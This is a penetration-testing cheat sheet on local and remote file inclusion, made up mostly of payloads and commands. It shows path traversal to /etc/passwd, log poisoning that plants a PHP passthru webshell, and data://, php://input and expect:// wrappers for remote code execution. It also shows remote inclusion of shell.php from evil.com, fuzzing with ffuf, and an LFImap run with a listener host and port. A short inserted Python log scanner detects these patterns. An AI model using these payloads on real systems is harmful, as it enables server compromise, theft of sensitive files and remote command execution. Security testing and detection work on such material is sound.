File Inclusion
Notes about some basic File Inclusion attacks
Playground
Dangerous Function

| Language | Function | Read Content | Execute | Remote URL |
|---|---|---|---|---|
| PHP | include() / include_once() | ✅ | ✅ | ✅ |
| PHP | require() / require_once() | ✅ | ✅ | ❌ |
| PHP | file_get_contents() | ✅ | ❌ | ✅ |
| PHP | fopen() / file() | ✅ | ❌ | ❌ |
| NodeJS | fs.readFile() | ✅ | ❌ | ❌ |
| NodeJS | fs.sendFile() | ✅ | ❌ | ❌ |
| NodeJS | res.render() | ✅ | ✅ | ❌ |
| Java | include | ✅ | ❌ | ❌ |
| Java | import | ✅ | ✅ | ✅ |
| .NET | @Html.Partial() | ✅ | ❌ | ❌ |
| .NET | @Html.RemotePartial() | ✅ | ❌ | ✅ |
| .NET | Response.WriteFile() | ✅ | ❌ | ❌ |
| .NET | include | ✅ | ✅ | ✅ |
Local File Inclusion (LFI)
Local File Inclusion (LFI) is a type of vulnerability where an attacker can exploit a web application to include files that are already present on the server. By manipulating input parameters, such as URLs or form fields, the attacker can trick the application into loading files from the local file system, potentially accessing sensitive information or executing malicious code.
Basic LFI Payloads

| Payload | Description |
|---|---|
| /etc/passwd | Basic LFI |
| ../../../../etc/passwd | LFI with path traversal |
| /../../../etc/passwd | LFI with name prefix |
| ./languages/../../../../etc/passwd | LFI with approved path |
| php://filter/read=convert.base64-encode/resource=config | LFI with Base64 filter |
| ../../../../etc/passwd%00 | LFI with null byte |
Log Poisoning to RCE
# Inject Access Log
curl -X "<?php echo passthru(\$_GET['cmd']);?>" http://target.com/
# Access
http://target.com/index.php?page=/var/log/apache2/access.log&cmd=id
Access Log Location
Apache:
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
Nginx:
/var/log/nginx/access.log
LFI to RCE
# Data Wrappers
http://target.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
# Input Wrappers
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://target.com/index.php?page=php://input&cmd=id"
# Expect Wrappers
curl -s "http://target.com/index.php?page=expect://id"
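The payload forms listed above (path traversal, null bytes, php://, data:// and expect:// wrappers, log-file paths, remote URLs, and PHP tags written into the access log) all leave recognisable traces in web server logs. As an added example that is not part of the original notes, the following Python script classifies Apache combined-format access-log lines by those indicators; the log lines, hosts and the attacker.invalid domain are constructed, and the indicator list is an assumption drawn from the payloads on this page rather than a complete signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (hosts, paths and timestamps are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2309 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1803 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 4411 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "<?php echo passthru($_GET['cmd']);?> / HTTP/1.1" 501 0 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9812 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?page=http://attacker.invalid/shell.txt&cmd=id HTTP/1.1" 200 77 "-" "python-requests/2.31"
"""

# The request line sits between the timestamp's closing ']' and the 3-digit status code.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*)" (?P<status>\d{3}) ')
# Indicator checks, each run against one URL-decoded query-string value (assumed list, from this page).
CHECKS = [
    ("traversal", lambda v: "../" in v or "..\\" in v),
    ("null_byte", lambda v: "\x00" in v),                                   # %00 truncation
    ("stream_wrapper", re.compile(r"^(php|data|expect)://", re.I).match),  # LFI-to-RCE wrappers
    ("remote_url", re.compile(r"^(https?|ftp)://", re.I).match),            # RFI (allow_url_include)
    ("log_file", re.compile(r"/var/log/|/logs?/|\\logs\\|(access|error)[._]log", re.I).search),
    ("sensitive_file", re.compile(r"/etc/passwd|apache2\.conf", re.I).search),
]

def classify_request(line):
    """Return sorted LFI/RFI indicators for one access-log line ([] if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable"]
    tags = set()
    if "<?php" in line or "<?=" in line:  # PHP tag anywhere in the line: log-poisoning attempt
        tags.add("php_tag")
    # Drop the method and the trailing " HTTP/x.y"; keep only what follows '?'.
    target = m.group("req").split(" ", 1)[-1].rsplit(" HTTP/", 1)[0]
    for param in target.partition("?")[2].split("&"):
        value = unquote_plus(unquote_plus(param.partition("=")[2]))  # twice: catches %252e.. double encoding
        tags.update(name for name, check in CHECKS if check(value))
    return sorted(tags)

def scan(log_text):
    """Return (client_ip, tags) for every line that carries at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        tags = classify_request(line)
        if tags:
            m = LINE_RE.match(line)
            hits.append((m.group("ip") if m else "?", tags))
    return hits
```

Run scan(SAMPLE_LOG) to get one (ip, tags) pair per suspicious line; a clean request such as the first sample line produces no entry.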
Remote File Inclusion (RFI)
In most languages, including remote URLs is considered a dangerous practice because it may allow exactly this kind of vulnerability. This is why remote URL inclusion is usually disabled by default. For example, remote URL inclusion in PHP requires the allow_url_include setting to be enabled.
http://target.com/index.php?page=ftp://user:pass@localhost/shell.php&cmd=id
http://target.com/index.php?page=http://evil.com/shell.php&cmd=id
Automation
# Fuzzing Parameter
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://target.com/index.php?FUZZ=value' -fs 2309
# Check working payload with LFI wordlists
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://target.com/index.php?view=FUZZ' -fs 2309
# Read Apache2 Conf
curl http://target.com/index.php?view=../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf
Tools
LFImap
# Install
git clone https://github.com/hansmach1ne/LFImap
cd LFImap/
python3 -m venv lfimap_env
source lfimap_env/bin/activate
pip3 install -r requirements.txt
# Usage
python3 lfimap.py --help
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -a
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -x --lhost 10.9.245.106 --lport 443

WordLists
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt